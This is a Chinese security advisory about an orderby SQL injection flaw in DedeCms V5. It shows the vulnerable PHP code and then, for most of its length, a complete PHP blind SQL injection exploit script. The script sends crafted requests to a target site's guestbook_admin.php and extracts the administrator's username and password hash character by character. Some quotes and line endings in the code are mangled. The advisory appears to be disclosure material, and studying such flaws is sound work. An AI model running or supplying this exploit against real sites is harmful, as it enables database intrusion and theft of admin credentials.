DedeCms V5 orderby参数注射漏洞

    影响版本:
    
    DedeCms V5漏洞描述:
    
    DedeCms由2004年到现在，已经经历了五个版本，从DedeCms V2 开始，DedeCms开发了自己的模板引擎，使用XML名字空间风格的模板，对美工制作的直观性提供了极大的便利，从V2.1开始，DedeCms人气急却上升，成为国内最流行的CMS软件，在DedeCms V3版本中，开始引入了模型的概念，从而摆脱里传统网站内容管理对模块太分散，管理不集中的缺点，但随着时间的发展，发现纯粹用模型化并不能满足用户的需求，从而DedeCms 2007(DedeCms V5)应声而出.80sec在其产品中发现了多个严重的SQL注射漏洞，可能被恶意用户查询数据库的敏感信息，如管理员密码，加密key等等，从而控制整个网站。
    
    在joblist.php和guestbook_admin.php等文件中对orderby参数未做过滤即带入数据库查询，造成多个注射漏洞。漏洞部分代码如下
    
    -------------------------------------------------------
    
    if(empty($orderby)) $orderby = 'pubdate';
    
    //重载列表
    
    if($dopost=='getlist'){
    
    PrintAjaxHead();
    
    GetList($dsql,$pageno,$pagesize,$orderby);//调用GetList函数
    
    $dsql->Close();
    
    exit();
    
    ……
    
    function GetList($dsql,$pageno,$pagesize,$orderby='pubdate'){
    
    global $cfg_phpurl,$cfg_ml;
    
    $jobs = array();
    
    $start = ($pageno-1) * $pagesize;
    
    $dsql->SetQuery("Select * From sec_jobs where memberID='".$cfg_ml->M_ID."' order by $orderby desc limit $start,$pagesize ");
    
    $dsql->Execute();//orderby 带入数据库查询
    
    ……
    
    ----------------------------------------------------------
    
    <*参考
    
    http://www.80sec.com/dedecms-sql-injection.html
    
    *>
    
    测试方法:
    
    [www.sebug.net]
    
    本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    
    print_r('
    
    --------------------------------------------------------------------------------
    
    DedeCms >=5 "orderby" blind SQL injection/admin credentials disclosure exploit
    
    BY Flyh4t
    
    www.wolvez.org
    
    Thx for all the members of W.S.T and my friend Oldjun
    
    --------------------------------------------------------------------------------
    
    ');
    
    if ($argc<3) {
    
    print_r('
    
    --------------------------------------------------------------------------------
    
    Usage: php '.$argv[0].’ host path
    
    host: target server (ip/hostname)
    
    path: path to DEDEcms
    
    Example:
    
    php ‘.$argv[0].’ localhost /
    
    ——————————————————————————–
    
    ‘);
    
    die;
    
    }
    
    function sendpacketii($packet)
    
    {
    
    global $host, $html;
    
    $ock=fsockopen(gethostbyname($host),’80′);
    
    if (!$ock) {
    
    echo ‘No response from ‘.$host; die;
    
    }
    
    fputs($ock,$packet);
    
    $html=”;
    
    while (!feof($ock)) {
    
    $html.=fgets($ock);
    
    }
    
    fclose($ock);
    
    }
    
    $host=$argv[1];
    
    $path=$argv[2];
    
    $prefix=”dede_”;
    
    $cookie=”DedeUserID=39255; DedeUserIDckMd5=31283748c5a4b36c; DedeLoginTime=1218471600; DedeLoginTimeckMd5=a7d9577b3b4820fa”;
    
    if (($path[0]<>’/') or ($path[strlen($path)-1]<>’/'))
    
    {echo ‘Error… check the path!’; die;}
    
    /*get $prefix*/
    
    $packet =”GET “.$path.”/member/guestbook_admin.php?dopost=getlist&pageno=1&orderby=11′ HTTP/1.0rn”;
    
    $packet.=”Host: “.$host.”rn”;
    
    $packet.=”Cookie: “.$cookie.”rn”;
    
    $packet.=”Connection: Closernrn”;
    
    sendpacketii($packet);
    
    if (eregi(”in your SQL syntax”,$html))
    
    {
    
    $temp=explode(”From “,$html);
    
    $temp2=explode(”member”,$temp[1]);
    
    if($temp2[0])
    
    $prefix=$temp2[0];
    
    echo “[+]prefix -> “.$prefix.”n”;
    
    }
    
    $chars[0]=0;//null
    
    $chars=array_merge($chars,range(48,57)); //numbers
    
    $chars=array_merge($chars,range(97,102));//a-f letters
    
    echo “[~]exploting now,plz waitingrn”;
    
    /*get password*/
    
    $j=1;$password=”";
    
    while (!strstr($password,chr(0)))
    
    {
    
    for ($i=0; $i<=255; $i++)
    
    {
    
    if (in_array($i,$chars))
    
    {
    
    $sql=”orderby=11+and+If(ASCII(SUBSTRING((SELECT+pwd+FROM+”.$prefix.”admin+where+id=1),”.$j.”,1))=”.$i.”,1,(SELECT+pwd+FROM+”.$prefix.”member))”;
    
    $packet =”GET “.$path.”member/guestbook_admin.php?dopost=getlist&pageno=1&”.$sql.” HTTP/1.0rn”;
    
    $packet.=”Host: “.$host.”rn”;
    
    $packet.=”Cookie: “.$cookie.”rn”;
    
    $packet.=”Connection: Closernrn”;
    
    sendpacketii($packet);
    
    if (!eregi(”Subquery returns more than 1 row”,$html)) {$password.=chr($i);echo”[+]pwd:”.$password.”rn”;break;}
    
    }
    
    if ($i==255) {die(”Exploit failed…”);}
    
    }
    
    $j++;
    
    }
    
    /*get userid*/
    
    $j=1;$admin=”";
    
    while (!strstr($admin,chr(0)))
    
    {
    
    for ($i=0; $i<=255; $i++)
    
    {
    
    $sql=”orderby=11+and+If(ASCII(SUBSTRING((SELECT+userid+FROM+”.$prefix.”admin+where+id=1),”.$j.”,1))=”.$i.”,1,(SELECT+pwd+FROM+”.$prefix.”member))”;
    
    $packet =”GET “.$path.”member/guestbook_admin.php?dopost=getlist&pageno=1&”.$sql.” HTTP/1.0rn”;
    
    $packet.=”Host: “.$host.”rn”;
    
    $packet.=”Cookie: “.$cookie.”rn”;
    
    $packet.=”Connection: Closernrn”;
    
    sendpacketii($packet);
    
    if (!eregi(”Subquery returns more than 1 row”,$html)) {$admin.=chr($i);echo”[+]userid:”.$admin.”rn”;break;}
    
    if ($i==255) {die(”Exploit failed…”);}
    
    }
    
    $j++;
    
    }
    
    print_r(’
    
    ——————————————————————————–
    
    [+]userid -> ‘.$admin.’
    
    [+]pwd(md5 24位) -> ‘.$password.’
    
    ——————————————————————————–
    
    ‘);
    
    function is_hash($hash)
    
    {
    
    if (ereg(”^[a-f0-9]{24}”,trim($hash))) {return true;}
    
    else {return false;}
    
    }
    
    if (is_hash($password)) {echo “Exploit succeeded…”;}
    
    else {echo “Exploit failed…”;}
    
    ?>爱安全建议:
    
    暂无
    
    http://www.dedecms.com// aianquan.com [2008-08-13]
    
    
    (本文由责任编辑 pasu  整理发布)